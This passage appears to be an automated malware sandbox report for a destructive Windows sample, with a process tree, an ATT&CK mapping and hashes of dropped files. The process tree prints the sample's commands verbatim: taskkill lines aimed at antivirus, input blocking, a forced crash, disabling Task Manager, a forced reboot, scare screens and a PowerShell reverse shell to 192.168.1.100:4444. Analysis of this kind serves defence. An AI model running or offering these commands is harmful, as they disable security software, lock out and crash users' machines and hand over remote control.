    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        5⤵
        
        PID:1204
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        5⤵
        
        PID:5900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        5⤵
        
        PID:1020
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1364
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        5⤵
        Kills process with taskkill
        
        PID:6024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        5⤵
        
        PID:5816
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\giw2awhm\giw2awhm.cmdline"
        6⤵
        
        PID:5168
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class BSoD { [DllImport(\"ntdll.dll\", SetLastError=true)] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ResponseOption, out uint Response); }'; [BSoD]::NtRaiseHardError(0xc0000005, 0, 0, [IntPtr]::Zero, 6, [ref]0)"
        5⤵
        
        PID:8388
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxeogjgv\rxeogjgv.cmdline"
        6⤵
        
        PID:2456
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /r /f /t 0
        5⤵
        
        PID:1748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\syqrdlp0\syqrdlp0.cmdline"
      4⤵
      PID:4164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnm5nvkm\xnm5nvkm.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4356
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD0.tmp" "c:\Users\Admin\AppData\Local\Temp\xnm5nvkm\CSC7D90A2CBA054551B5E7F140DAB9137.TMP"
        5⤵
        
        PID:1756
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3368
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a4oa5l5k\a4oa5l5k.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4316
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF2C.tmp" "c:\Users\Admin\AppData\Local\Temp\a4oa5l5k\CSCFB1DED8D7A847FBA98346D86C9D7987.TMP"
        5⤵
        
        PID:5072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
    3⤵
    PID:4092
- - C:\Windows\system32\taskkill.exe
    taskkill /IM MsMpEng.exe /F
    3⤵
    - Kills process with taskkill
    PID:5900
- - C:\Windows\system32\taskkill.exe
    taskkill /IM AvastSvc.exe /F
    3⤵
    PID:7124
- - C:\Windows\system32\taskkill.exe
    taskkill /IM avgsvc.exe /F
    3⤵
    PID:6844
- - C:\Windows\system32\taskkill.exe
    taskkill /IM McAfee.exe /F
    3⤵
    PID:7164
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Norton.exe /F
    3⤵
    PID:2232
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Kaspersky.exe /F
    3⤵
    PID:6440
- - C:\Windows\system32\taskkill.exe
    taskkill /IM BitDefender.exe /F
    3⤵
    - Kills process with taskkill
    PID:6804
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Sophos.exe /F
    3⤵
    PID:6992
- - C:\Windows\system32\taskkill.exe
    taskkill /IM malwarebytes.exe /F
    3⤵
    PID:6508
- - C:\Windows\system32\taskkill.exe
    taskkill /IM CylanceSvc.exe /F
    3⤵
    PID:6808
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Panda.exe /F
    3⤵
    - Kills process with taskkill
    PID:6680
- - C:\Windows\system32\taskkill.exe
    taskkill /IM EsetService.exe /F
    3⤵
    PID:6172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
    3⤵
    PID:5544
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yefbnyxj\yefbnyxj.cmdline"
      4⤵
      PID:5496

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3828855 /state1:0x41c64e6d
1⤵
PID:3528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a285423309193b2724d32ccdaf3223e7

SHA1
6ecbf56fe6fe9609399b1a0f4bf04b3775ce0d28

SHA256
0c1d44d56a79461199b142ecd3d3d52c23953785ddb0157f7ad210e35c923ec7

SHA512
09baa328dd39cb4839a11b5f4fea5b6dabb4cf77fa9c633e05606e7ebb288c2f5b7fb701a06431d9701d6bee117da2fb6e34228cdd77bc210fadad349a43af8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
54e15ac7239e5061d9d16666ceb5363d

SHA1
6b8e4263cbbb973a603f8d0e2ca2bc0af8d775dd

SHA256
0f4e4c5bf7dc3c4a47f86e93dd267c042902b8b551c941ec7da0d0ea1c4a3ac4

SHA512
972f65bb22f4b3842675f9098a941137767adafee993a4b0a7498913bbcaf9f7ccecb9b992d0b40e23ef640e66b4ad07617da5ca710d1fb338544b2c89866509

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9843d1de2b283224f4f4b8730ccc919f

SHA1
c053080262aef325e616687bf07993920503b62b

SHA256
409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1

SHA512
13d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
f8c77e589fcbe53433a3c876f789f3df

SHA1
cec91d6daa1e445867413b90d8fac5cbeee5d3b0

SHA256
ad441e3950a6eae549e853fa580d842c8aa46a7d5d208e1e149e92e0c7953c08

SHA512
3b22a15bca44de77a7536f15fdfdf92105af9a411fe1d98da8bf223ced492595254f217e7b4b4b654e032a220be20189fd7735f5118a205ba78b4d7851b2749e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
57fcf1707b83a1d541e58b1cc34c4544

SHA1
7ce92f9dc233f8c746ebf8d6daaef9b74c939340

SHA256
30c3dc0e3a75853087d00bfc3f6912b1ead954c10fc1da21eba2bb2a99a80e26

SHA512
a42156098d954dc4a55c63ede2c584ff5c9d61c2a6a0ee105efef5c9e7ece497ef47b545dca3834aeb763480cfab2ffefecfc7c09daaa15b7a150cb5a1ec5ed3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc6be6e7bad29f671be97d8891f8ccc6

SHA1
cf87b78e2159ad71a1e7832f8ad0287e84d473a9

SHA256
e02ada53bc66b92eb745e2e9dd3e960d279c0a666960a0c6a76e44882cdccaaa

SHA512
f4d6f92f5155e1334c22a93c2bcc73bab67440c7e7a2b4ab996812e114e772b577b50cc0ed578ff10130b8ce1833b8303ac2d8cced7c8a5e10e46b62915f2873

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
44cd935b8b295e024c793a8038cbeed8

SHA1
dd4dfeb934e2e5fc83cb7d3e7c4a10dd5db6a5d3

SHA256
f8f56bbc223c56d860b9f71fb4c5f1809c0be7aae71f6bc0ec2e3b163aa9b3dd

SHA512
9285020e7455e6fc2c235256dcca37a8cf2f341cb09345b1182ca8b43f260dcbb5aca2dfe508d616d9df868daad7e5b7b6b6e1518e4ccca98aed3854eed323d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a12c129e02e3d0e0ff14020158d6e53

SHA1
383434d0df826622f06b1f3811124782df21507b

SHA256
e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7

SHA512
4b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
18f42e397118450fea261e96bb25286f

SHA1
cdedf9abb0b94cba65c48702dcb3959455c2d3ef

SHA256
98fd0625d387cc23d95d4fe72f698dc731b15ee23f471012d923fcd3de69b348

SHA512
9e6a05570b2c611d637829f757b5a4ecdf31a518593fb54de2473cb46a1986281b68c2dc0006c9a59225d50c98f9d3c8963abc2f321efe8214b4f3dbfe3cfa25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dc8c47d3e16951c6252f485ad9d08bc5

SHA1
b536a25cb7341515402abaebd7a305ba4b6114b0

SHA256
9b189c753cbb359835c2f006dde5aa7b558c90a5990572a20b3cb29a626fd3fc

SHA512
5fed4de232d5a5da035fbc26b399a3f49f187359ff3f330eae7fc0d552474afc5e347e9f019c211ef0af9004a713de5d47ac739d2a7bd725765e29aacab490b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ltw2ifj\3ltw2ifj.dll

Filesize
3KB

MD5
5335c8d7d2cb080889fb3a64e555045b

SHA1
4c69ba0f2399b2d9cfee7e6813720c7a33c64acd

SHA256
711ecf73beb7ce5f21464ed1272ee1d69d2cb8ca3a3974037fe23fddf0337cde

SHA512
739ee273bc1503d1a3b8882f79ec67ec13301739926330b9b4ff6abe48db6163903ada3634fe06c2df6a663652e0b014e1fbe87b2ec9c4e15a85f271f0f3081f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESABD0.tmp

Filesize
1KB

MD5
e9e87f87be56d20cf06ca74d5778a6de

SHA1
d4ceb7d976fb779be9a01b3cefa813d135537e21

SHA256
6e567e7b6d51faeb9423606c17a4d933b83fd86db80c9a87e071d5cc2cd4b1cc

SHA512
af6995b9fdf120bb5b4a0e4dfd31a733e6b5cd3b5efe80b429a466865cefcb30755622b3d0bc253e883e96ec6d0b3db19ca0440d51453572269e5453f89d1f65

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESACF9.tmp

Filesize
1KB

MD5
c9355a0149e137f4313b6612b85419b1

SHA1
9e422b3bb3a9d74583cd6d6dc8e8214e2e94a247

SHA256
7c86135b3b48b70a2348e0d682b67b950afea3bcb7c5544e572e1784d5a81203

SHA512
72c12932b65fd0fe9af444cefa24c3e80ba53fa0abda452c8d85e626fd4720842a24a22ef528b83ccdd56536f9137a91886f321b9328a2d618eca30ddfcb2bc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAF2C.tmp

Filesize
1KB

MD5
bf23d88edcb1eeccd0e9c5e4e38e9738

SHA1
0923388acf5538490cd8968ae307642c9ab5b208

SHA256
609720a68b8a49f43e18a7101a6d62ee44905a1890ea11f9d2b791e6d0c80d9b

SHA512
58b21091db6e666800666cb86bd027573d461f62b7cb2831624e6ae6683c1bcbd215b2f43662f233865f3308fbc42570176a47e37889ccd28fe2a53bd62f7aa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAF6A.tmp

Filesize
1KB

MD5
8d36e13837c8a396543f15c597938ec0

SHA1
1c25272dfcf745716795b9d6bdb55cd59786312e

SHA256
a362083bdc08782ce4700a0616994e99f3fbdb53bf44a6342c1d805eb6acba0b

SHA512
b3d3ebdb609248ed65db18c9baa51713a13eeaf133c57185414652d281e6b466df176f519cbfcc07f9fbaff7e1d906ff9474c64dd12a954648aeb085e44393df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBEBC.tmp

Filesize
1KB

MD5
37fcccb36c6696aaf6450b2ff9e2e9fe

SHA1
8eb7aa8ed23b0be5d91ef2e79e4da9deb0fa99c4

SHA256
b561fec4fb0eafa9620e1058b18c8b4dad3fab02eb2b399f3d8309b5c2e80c25

SHA512
9b19f3069273db3d7fd4d2ad24ad9d163b1ebdcb7194d19fa95c19aeda20e0f2d0425c43ce93fd4a01be01d7d5ea47d097526651746c00108b643e52256c0e63

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dten5vry.gsd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a4oa5l5k\a4oa5l5k.dll

Filesize
3KB

MD5
5675e71a512065e16e1660e383a74530

SHA1
6fce799a59851577e02f54622631ce6146761b25

SHA256
32ab2dedd22bdf89317067a8987b8fa6729b77f1f061764ec7569375c9aa0b23

SHA512
fc538e0342efedf4c98c3efacfd62c321b4df696464a9adfc2b0cb96c2425a210c568cc6601bc99f1cb0ac0b5d12f34d906988980a917a6651add0a7ec8574d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cfuffori\cfuffori.dll

Filesize
3KB

MD5
6d7fd04b9397320d0ac0231df8b06f96

SHA1
6e7c5edc18e24336bf72b1d20da5aef3b24b799c

SHA256
7e2b4dad4ba015e43860000644e135d4ebcbf3356d50a195c44a659885f091c0

SHA512
9042f5bef60dfa2b135f038a6e6ff7f15c6fa3383dcebd93f603d962ea3fd55674570ca1c22401162278c0676ccf1dc1771ca5c6dfd67b0c4a277c7e7c1f345d

Download Submit
C:\Users\Admin\AppData\Local\Temp\d00rv2eg\d00rv2eg.dll

Filesize
3KB

MD5
7d711855d6d85c818a6be58f7839f51a

SHA1
a861b9f8326280160cdf63eeb1559586264528fa

SHA256
cdc0d7e7993128befa645d6b8ebfff91920ffd1436acfcadc60ff6f1fe85dbe5

SHA512
24a89be5a9cdf0a70a87d44253a982dd568ecaa8537117bcb2dfef1a599c3b1ecbde29b041d1c603ed0ec1da36e4d0d62dd64505ce2d128cf1002317a37764c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nocgx2q5\nocgx2q5.0.cs

Filesize
161B

MD5
e95e2d363a15e4c834cc57a1714f74a5

SHA1
882a88742bfbce1d170b0fea8c116656db16e1e4

SHA256
a3de9db0a72610c41cb49fb1c84ffd4dfd957da2f608fb6e4aaa9ada540a3bd6

SHA512
753b0c1caa6138664dc8574b6c84fe05ac73736d8a2adc47e3f44b95137313a43451f413f8377020b40bd24e6964c29c1c2f6630e7ab2085819cb8919d730057

Download Submit
C:\Users\Admin\AppData\Local\Temp\xnm5nvkm\xnm5nvkm.dll

Filesize
3KB

MD5
a7faf3ef0b8c5aeebd48fe38f41c885a

SHA1
62447e48033d74796da6a358e184daa506395ac4

SHA256
d953056aa2d38dd18841fa5a65306ea7b8ef010785ecd0c8c80b3c6fb894708e

SHA512
c8b60b8f91fb6d434ea51c76aaf6093056612d5ebcee5d34229ed06a325ce5c86558d94dbfae17fea0bb795c5ec3b5a2e6ab09993cc278aab7bb84ca18ff1660

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3ltw2ifj\3ltw2ifj.cmdline

Filesize
369B

MD5
82c97e81405fd0375a5e30c016734170

SHA1
6a1d645737b6b0e51ed80c922d66b4025c647872

SHA256
8bc65f88824440d15a7d1fefeac3b2d1c5725c7dcd3f985a341f94db5ed635f5

SHA512
7f0a24d1c6a26c540e61539a1f97c96dda1c98c7aca1534ced5244383aa419340b3d3ccd9536e5e301d66113262ad78e131dce9be561327b56bf8751d0a0bc5d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3ltw2ifj\CSCBEE83B9D7B054B13A5AE4DACD033D719.TMP

Filesize
652B

MD5
f5e272a6f3f47d03a6f5c06af4bf0880

SHA1
042cc3cf60f0b11127676f7faa800375809a1cff

SHA256
5ab204ba1a43659f2f0b64670442501bdf9f0d308cadc929e860c8c04d3163a9

SHA512
305bb0b8001bf2c3898a54c8cbd2500a79a00ec1804a56e2163df849ac60e341463e14301a7e8564170fb31e936347ac6480fa7f5e35d67f16718e38de2bfb0f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a4oa5l5k\CSCFB1DED8D7A847FBA98346D86C9D7987.TMP

Filesize
652B

MD5
9e01810295be22aff1a5ccd09ed9ea18

SHA1
955bea60378ae90f92b7f4a2ab821014922fe321

SHA256
6e72f86c06d1e6bb7f0410694e093ed5ef2f402071492e8e52a230d6b8130092

SHA512
84f46b9e86214e605671f0c311b392f057af4ae271132fd6ef29fbcc03f3bbabf9af415cff6707e2081ea7fab0e2a1ef008d7a3de9368bef3e230ab4af3e9dc7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a4oa5l5k\a4oa5l5k.0.cs

Filesize
158B

MD5
e3c9d9843af7e21439ccc80379cce2df

SHA1
a3ec333e4097301b2d4c9d342f4424d0216b4edf

SHA256
474b21380fe405cebeaba9cea7a3c5fe98e22e468760a9c26a410082201ccab3

SHA512
727a23f425992704d98c0ef1ca57bf0bd27763a807dce4f9fe44ebd95855af9f205aa74929bdfc1aad5afa7bc7fde8db621f3b7985da417b46847aa9f24d8988

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a4oa5l5k\a4oa5l5k.cmdline

Filesize
369B

MD5
d4dac284d30bd9c908925b82046b2bdd

SHA1
52e9d510aadbbad88205a217336fbbe2e05c2e3e

SHA256
fe59324a1f9e7dee4348fb8ed9025bf4a16995114bd1311a1da90cfe46f66954

SHA512
2b5fc059622b18af10b27dfdad9577bef0d4d9ed0547aed8f3df8978e6f63ec14f99a5f204f6d33831a92bd91ccd0c10c9041ebe2727c023b5856938070e3c92

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\arqem50b\arqem50b.cmdline

Filesize
369B

MD5
e7ec5cd29611eba411d8f5156929775e

SHA1
f206036dd08fbe702c0c2e69305528b8656a2cbd

SHA256
5c04dbd211a6e7a2a0fdc26d621be2aacf390846ea46667aaf1eb1b257cd999a

SHA512
7934f99c2d77a9dabe494378421433eca89ee744f85dee18c9461188477959a6c073b0a6383389dcfef7e7cee59fe06b128e0977b9384c961e448a4a617f87af

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ccjbr3bq\ccjbr3bq.cmdline

Filesize
369B

MD5
c4760044fb16dc6e102e753a33e748ca

SHA1
35c017695a42380056e4cb0d16ff3ed2ab77e4df

SHA256
586e9244ddb5bfae253ca1ad26e39912364150af3bc77d13f5f1b8af6eddbd17

SHA512
cc51a8e9a599523e9cc58682186a3ad772ec91747a4e592f4adb074621127db894087f7c544aa0a708931705adab00e64091263d76c85463c029b6e77bfe33bf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cfuffori\CSC411A0DE3E9004BD79E5E7D31AAA8CBA2.TMP

Filesize
652B

MD5
3ac23064cdcf0553e0d4f307a96c9604

SHA1
0cd6a07451db99e5dfe7b3689dc9f17bd4d78e3d

SHA256
eaa03aeee04238186f65446e9d77c47d5b8afd1d5a2796398fd75550bf52ed98

SHA512
b4d260b17a3c9249585cf193021ab729cc4e0876b7039f57b452cfa13c7ced18306a1aaabffcdb0b9a79d8c3ecd60923594b45b2a5e92f578029c1f69ccda15b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cfuffori\cfuffori.cmdline

Filesize
369B

MD5
3d450519ea43e9709ea87ac9edbaf943

SHA1
284b3a418e3572959099907219b39b31e00ddb22

SHA256
5a33210d97cfc8b3938b37af9895022acfb256d0a76459c8809ad8f2249b7894

SHA512
ba9363a96bf6580bbbaf2e976db3dbde1c420734f0fbadd8e50a0dda9154eb10a3096e9029a6d382b392ca6e0e9b769d470cafbae1498c12d03133924cc31182

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d00rv2eg\CSC5F745B3CA2374BC9AE6BAE27541BF2E8.TMP

Filesize
652B

MD5
34eb15969b9e425cf6ad5a6351d84994

SHA1
11d10f8a596c9e8d260e0f85fb115dcbcb260c84

SHA256
de60d4c29d7eca9414bd3d0c344e167d36c43611b04d28e7ad3f5f16fc2778de

SHA512
40105853008fc6505821224a00a0c7f24cd001c630d6bffa74e252cfdd86c059562061198ce3e1978ccf6fb74fcd213918d3f4ae3bd68c2fd159c13be642c611

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d00rv2eg\d00rv2eg.cmdline

Filesize
369B

MD5
27a55b0afe45711f98d714df038c47e0

SHA1
3fabd4aba2b46825cc411dfcc562490e09d6de29

SHA256
e75b0fa60cf478847389e02ec031a907a595c443bd3ae06563bca36f539ebe7e

SHA512
726a5666174019fc8299e127dc90b867975b3d3bf85c410eb4cb46328a12d3878107b820c87f0deaeb9920d1a63d4bed91537045255354f1d379ad5311ed1343

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lmuznebl\lmuznebl.cmdline

Filesize
369B

MD5
44aa85b882736727345bd16fe90bd4cb

SHA1
055711d28ef395e21473be7791ea2f9fee927524

SHA256
5feb697be00e128eead20bd2259856eb05078fc6a936f7f043b220527f53ff11

SHA512
68793b2a46dab46f81a16b179c1e23ec22b2a86571c4d5c7bb34c4af79ca26d474fbbf84c54bb0b0abc6e9d58358c51de958522da9827a8b8a4423a1b4d6b250

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m105yl1s\m105yl1s.cmdline

Filesize
369B

MD5
fcd9c123d2bd8476873dac2412ecfb94

SHA1
1fd3c25d6ab34d60c3e2e566acae3b36380573a9

SHA256
8bee4aa603e450e17aaef6005a791833bb8b00884cf132f9fe0b14c15176043d

SHA512
e415d216eb44502f6cff3eb9407ffb51fcbc1537dfdc40885463c5d26fdded7616b20bac5f7d192bff8739fb36646de29eb52a03e127478acaeddd70af0e78ec

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m1cmr1ng\m1cmr1ng.cmdline

Filesize
369B

MD5
09045e10be03816dd04fad5468b41914

SHA1
abb583e34b7dd11174cd8ae87039a858d45ecf97

SHA256
2907f9a9af24025971426c2bbfccc6beafd4aebe00242f929d1a6da787840eb3

SHA512
3731655009e3491d31b4601af570c63d655aa0ff32047f7bd1a79dc1700760af51ac504c31e717aa58a786e4a79a7c4f0e052059dce5d16fd153892814c7ea6d

Download Submit
